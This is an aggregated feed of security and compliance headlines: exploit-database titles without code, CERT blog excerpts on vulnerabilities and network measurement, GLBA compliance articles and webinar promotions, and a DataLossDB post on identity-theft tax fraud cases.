==> local - Show In Browser 0.0.3 Ruby Gem File Injection Vulnerability

http://www.1337day.com/rss

==> dos / - SAS Integration Technologies Client 9.31_M1 Buffer Overflow

http://www.1337day.com/rss

==> web - PHP-fusion v7.02.06 XSRF/CSRF vulnerability

http://www.1337day.com/rss

==> web - Kimai 0.9.2.1306-3 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Spider Catalog 1.4.6 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Spider Event Calendar 1.3.0 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Matterdaddy Market 1.4.2 CSRF / Arbitrary File Upload

http://www.1337day.com/rss

==> web - AVE.CMS 2.09 Blind SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - IBM WebSphere DataPower 3.8.2 / 4.0.x / 5.0 Cross Site Scripting

http://www.1337day.com/rss

==> remote - AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

http://www.1337day.com/rss

==> remote - Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow

http://www.1337day.com/rss

==> local - Ophcrack v3.5.0 - Local Code Execution BOF

http://www.1337day.com/rss

==> remote - MS Internet Explorer & MSN Explorer Arbitrary File Overwrite

http://www.1337day.com/rss

==> dos / - win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase

http://www.1337day.com/rss

==> remote - Linksys WRT160nv2 apply.cgi Remote Command Injection

http://www.1337day.com/rss

==> remote - D-Link DIR615h OS Command Injection Vulnerability

http://www.1337day.com/rss

==> web - iOS < 5.0 Free Apps/Music Bug

http://www.1337day.com/rss

==> web - Haraj Script Stored XSS and File Upload Vulnerability

http://www.1337day.com/rss

==> web - Dsl Router D-link BZ_1.06 Multiple Vulnerabilities

http://www.1337day.com/rss

==> local - Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root Exploit

http://www.1337day.com/rss

==> web - Moa Gallery 1.2.6 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - ZPanel Crafted Template Remote Command Execution Vulnerability

http://www.1337day.com/rss

==> dos / - nginx 1.3.9-1.4.0 DoS PoC

http://www.1337day.com/rss

==> web - CKEditor < 4.1 Drupal 6.x & 7.x - Persistent XSS Vulnerability

http://www.1337day.com/rss

==> web - Wordpress hd-player 0day Exploit

http://www.1337day.com/rss

==> web - Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> remote - SSH User Code Execution Vulnerability

http://www.1337day.com/rss

==> remote - Mutiny 5 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Wordpress Newsletter 3.2.6 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> local - Kloxo 6.1.12 Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> Keep Calm and Deploy EMET

http://www.cert.org/blogs/vuls/rss.xml CVE-2013-1347, the Internet Explorer 8 CGenericElement object use-after-free vulnerability, has gotten a lot of press lately because it was used in a "watering hole" attack against several sites.

==> Don't Sign that Applet!

http://www.cert.org/blogs/vuls/rss.xml Hi, it's Will. I've recently been looking into the state of signed Java applet security. This investigation was triggered by the Oracle blog post IMP: Your Java Applets and Web Start Applications Should Be Signed, which, as the title implies, suggests that all Java developers sign their applets, regardless of the privileges required. In this blog entry, I explain why this practice is a bad idea.

==> Finding Patterns of Malicious Use in Bulk Registrations

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf with my colleague Jonathan Spring. In 2011, .co.cc [1] and .co.tv [2] were removed from Google’s search results because of the high incidence of malicious domains (.cc is the TLD for the Cocos Islands and .tv is the TLD for Tuvalu). Neither of these domains is an official TLD of its respective country of origin, but is a zone in which the owner happens to make single subdomains freely available and charge a nominal fee for bulk registrations. Similarly, an APWG report for the second half of 2011 lists .tk, the TLD of the island of Tokelau, as the most common TLD used in phishing attacks. It also permits free domain registration.

==> GeoIP in Your SOC (Security Operations Center)

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Vijay Sarvepalli, Security Solutions Engineer in the CERT Program. Today, whether you’re shopping for a new house or trying to find a babysitter, you end up using Google maps or a similar service to assist your decision making. In this blog post, I discuss GeoIP capabilities that can be built into your SOC to provide a spatial view of your network threats and how this view can help your network situational awareness.

==> Second Level Domain Usage in 2012 for Common Top Level Domains

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf with my colleague Jonathan Spring. Here is a look at second level domain (SLD) usage in 2012 for the most common generic Top Level Domains (gTLDs): biz, com, info, mobi, net, and org. We used two data sources: (1) the master zone files (RFC 1035 sec. 5) and (2) the SIE (http://sie.isc.org), a passive DNS data source. From these sources we examined three features of global gTLD usage—the number registered, the number active, and the ratio.

==> The Growth of IPv6 Announcements

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf again with my colleague Rhiannon Weaver. IPv6, the replacement for IPv4, has been heavily marketed. To consider exactly how popular IPv6 is on the internet, one method is to examine the number of autonomous systems (ASes) that announce IPv6.

==> An Alternate View of Announced IPv4 Space

http://www.cert.org/blogs/vuls/rss.xml In my previous post, I examined the total amount of IPv4 space announced and presented cumulative graphics. While this view is useful in determining how much IPv4 space is announced, it doesn’t say much about which IPv4 space is announced. The graphic in Figure 1 is an alternate visualization of the data from that post and is called the Internet barcode.

==> The Growth Rate of IP Addresses That Are Advertised as Usable on the Internet

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf of the Network Situational Awareness Team. Recently, I have been considering the amount of IPv4 space that is announced on the Internet. All blocks have been allocated, but how many are actually being used? To investigate this, I examined the routing tables to determine which networks were announced on the internet as usable from January 1, 2009 through December 31, 2012.

==> Watching Domains That Change DNS Servers Frequently

http://www.cert.org/blogs/vuls/rss.xml Hello, this is Leigh Metcalf of the CERT Network Situational Awareness (NetSA) Team. Timur Snoke and I have discovered some interesting results in our continuing examination of the public Domain Name System (DNS). Our work has been focusing on domains that change their name servers frequently.

==> Anatomy of Java Exploits

http://www.cert.org/blogs/vuls/rss.xml On behalf of the real author, my colleague David Svoboda (and a couple others who work on the CERT Secure Coding Initiative), here's a post analyzing recent Java exploits. Java was exploited recently and last August. The August exploit was patched by Oracle on August 30; this most recent exploit now also has a patch available. Strictly speaking, the vulnerabilities that permitted both exploits are independent; the current exploit attacked code that was unused by the August exploit. Nevertheless, these vulnerabilities were quite similar. This blog post examines the vulnerabilities that permitted Java to be exploited in each case, using the proof-of-concept code exploits that have been published for them in January 2013 and August 2012.

==> Java in Web Browser: Disable Now!

http://www.cert.org/blogs/vuls/rss.xml Hi, it's Will and Art here. We've been telling people to disable Java for years. In fact, the first version of the Securing Your Web Browser document from 2006 provided clear recommendations for disabling Java in web browsers. However, after investigating the Java 7 vulnerability from August, I realized that completely disabling Java in web browsers is not as simple as it should be. Luckily, Oracle has since added a new option in the Java control panel applet to disable Java in the browser. If you haven't already done so, now is the time to disable Java in the browser.

==> Forking and Joining Python Coroutines to Collect Coverage Data

http://www.cert.org/blogs/vuls/rss.xml In this post I'll explain how to expand on David Beazley's cobroadcast pattern by adding a join capability that can bring multiple forked coroutine paths back together. I'll apply this technique to create a modular Python script that uses gcov, readelf, and other common unix command line utilities to gather code coverage information for an application that is being tested. Along the way I'll use ImageMagick under Ubuntu 12.04 as a running example.

==> A Look Inside CERT Fuzzing Tools

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Allen Householder of the CERT Vulnerability Analysis team. If you've been following this blog for a while, you are probably familiar with our fuzzing tools: Dranzer, the CERT Basic Fuzzing Framework (BFF), and the CERT Failure Observation Engine (FOE). While creating tools that can find and analyze vulnerabilities makes up a significant portion of our work in the CERT Vulnerability Analysis team, our focus is on developing and communicating the knowledge we've built into those systems. To that end, we recently published a pair of reports that describe a few of the heuristics and algorithms implemented in the BFF and FOE fuzzing tools. We briefly mentioned these techniques in the release announcements for the tools, but did not describe how they work in detail. Abstracts and links to the reports can be found below.

==> Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1)

http://www.cert.org/blogs/vuls/rss.xml Hi everybody. Allen Householder from the CERT Vulnerability Analysis team here, back with another installment of "What's new in CERT's fuzzing frameworks?" Today we're announcing the release of updates of both our fuzzing tools, the CERT Basic Fuzzing Framework (BFF) version 2.6 and the CERT Failure Observation Engine (FOE) version 2.0.1. The remainder of this post describes the changes in more detail.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml WebSearch version 4.2 that boasts of additional features like customized business process and collaborative workflow capability has been introduced by DocuLex, Content management software provider. WebSearch version 4.2 is a product of DocuLex Archive Studio that helps organizations with decision making power via automation of any business process through the benefit of systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice is released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder will guide an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar, creating a positive policy step forward for our industry on April 14, 2010. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> Advisers must know the ways to protect clients' privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Won't Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Friday's Wall Street Journal. (Use Google news to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as Agencies) adopted final Model Privacy Notice forms for compliance with the Gramm-Leach-Bliley Act (GLBA) and its implementing regulation, the FTC's Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule and, as such, now provide the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast abstracts the 8 workflow processes that create an effective vulnerability management solution to ensure security and document compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast and learn about an effective remediation plan that provides continuous protection from network vulnerabilities and helps comply with regulations such as PCI, GLBA and HIPAA.

==> New Degausser Introduced by SEM

http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery, its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations which must adhere to multiple requirements - 75 percent of organizations must comply with two or more regulations and corresponding audits and more than 40 percent must comply with three or more regulations.

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzying; they include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers' information, no matter how much it costs to do so. In today's litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most of the observers by references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition Of Guardium Created a Buzz in Security market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research Analyst, Chris McClean, for learning what leading companies are doing for effective risk and compliance management and steps you can take today. While risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, an additional complexity due to stringent compliance and regulatory requirements, like SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more, adds an additional layer of challenges for them. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance to federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that need help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. He'll also discuss how to transform a traditional data center that is inflexible and costly to a cloud computing environment that is secure, virtualized and automated, requiring less investment.

==> Sipera Secure Live Communications Mobility System Made Available by era Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Smartphone VoIP and unified communications, or UC, business ready are offered by Sipera SLiC. This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the company's system enables smartphone VoIP to include smart-card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad. Have you ever considered taking a role as the most senior person for information security working at a large corporation? Then you must be prepared to understand the key principles of information security, and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, it's easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees aren't overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj PJ Gupta, founder and CEO of Amtel, a company that helps enterprises to rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml A purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, FaceTime Communication, announced the commercial launch of its Augment, Migrate and Update, or AMU kit. The kit is devised for enterprises who are at the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml The former Chairman of the Federal Reserve [1979-1987], Paul Volcker, has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security should be ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft, many organizations are rightfully concerned about keeping their customers' data private. While the financial service industry has been regulated since the late '90s by the federal government, other companies would be wise to follow their lead. For some years now, financial service companies have had to comply with the provisions of the oft-maligned Gramm-Leach-Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml That federal regulation is part of the deal is very well known to many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections and on and on all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, it's for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organization's customers. And HIPAA protects and guarantees the privacy of an individual's personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With Virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In today's scenario it is a must for banks to devote a huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and keeping in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, featuring moderator Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research and Adam Swidler with Google. They present findings, regarding the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data Breach Notification Laws and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers' personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and Technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process - who implements and how, and Tripwire GLBA Product/Service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml A developer, manager and operator of data centers, CRG West, has completed SAS 70 Type II certification at the company's Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and technical minefield. First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers. The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Nothing is certain but death, taxes and identity theft.

http://datalossdb.org/incident_highlights.rss As we are well into tax season, there has been a trend of articles in the news involving identity theft and tax fraud. Individuals are stealing information from various sources, which are not only businesses, but also straight out of mailboxes in order to commit identity theft and file false tax returns. Some of these criminals have been reported to net as much as $11 million with their schemes before being caught. 641,690 incidents had been identified by the IRS as of September 30, 2012. Each of these incidents is a concern. However, all are not reported in DatalossDB as we require data loss incidents to have a steward organization. Therefore, we submit only to our database the schemes where personal data is stolen from an organization or business, but discard those where the data is stolen out of mailboxes as they don't fit our requirements. Here are some snippets of the latest cases we have seen in the news; these cases include both ones DatalossDB would and would not catalog. There seems to be a trend in state employees and tax preparers stealing information to file false tax returns themselves or to sell the personal information to others. In one case in Alabama, a state employee obtained identification information from a state database from October 2009 until April 2012. That is two and a half years in which she went undetected while working with co-conspirators to file over 1,000 false tax returns and receiving fraudulent returns totaling $1.7 million. In Los Angeles County, the Department of Public Social Services had an employee, who as a receptionist had access to the systems to input data and assistance requests. She took screenshots of 132 applicants' PII (Personally Identifiable Information), and with the help of her husband and friends filed 65 tax returns in 2011 netting a total of $357,704.90 in fraudulent claims.
In Silver Spring, MD, two brothers running a tax service together stole identities from Puerto Rican residents to submit fraudulent claims through their business. They filed 13 false returns totalling $43,264. Another tax preparer used information of previous clients and deceased persons in order to defraud the IRS and taxpayers for over $200,000 from 2003 to 2008. The largest case we've seen, which is currently awaiting sentencing, took place in Fort Lauderdale and involved the filing of around 2,000 false tax returns from October 2010 until June 2012. This particular identity theft tax fraud scheme pulled in over $11 million. To many, this might seem like a great way to make money. Here are some of the punishments that have or will befall these criminals. If convicted, the Alabama state employee is facing 20 years for each wire fraud count, 10 years for each computer fraud count, 10 years for conspiracy to file false claims, 2 years for aggravated identity thefts, fines, and mandatory restitution. The tax preparer, who used client and deceased persons' information, was sentenced to 60 months in prison and paying full restitution amounting in excess of $200,000. As for the case where the scheme pulled in around $11 million, one of the women involved is looking at possibly being sentenced to 351 years. That is around 6 lifetimes of prison! The IRS is taking action in response to the increase in tax related identity theft over the last few years. They have activated new identity theft filters, and are working with over 130 financial institutions to help identify identity theft schemes. The IRS has also trained over 35,000 people, who have direct contact with taxpayers, in ways to help identify red flags associated with identity theft, and they have doubled the employees in their tax related identity theft department. Multiple resources including the IRS are recommending a few things to help keep your identity safer.
Make sure that you do not carry your Social Security card around in your wallet or purse; if you do, take it out and place it somewhere secure. In fact, it is a good idea to take any documents containing personal information and secure them in your home. Many businesses ask for your Social Security number, even if it is not mandatory information. It is best to not automatically provide it every time you are asked. Never give out your personal information over the phone or email; the IRS does not contact taxpayers either way to acquire information. Monitoring your credit report on a regular basis can help to identify identity theft, hopefully before the loss becomes severe.

==> Knock, knock. Who's there? No one.

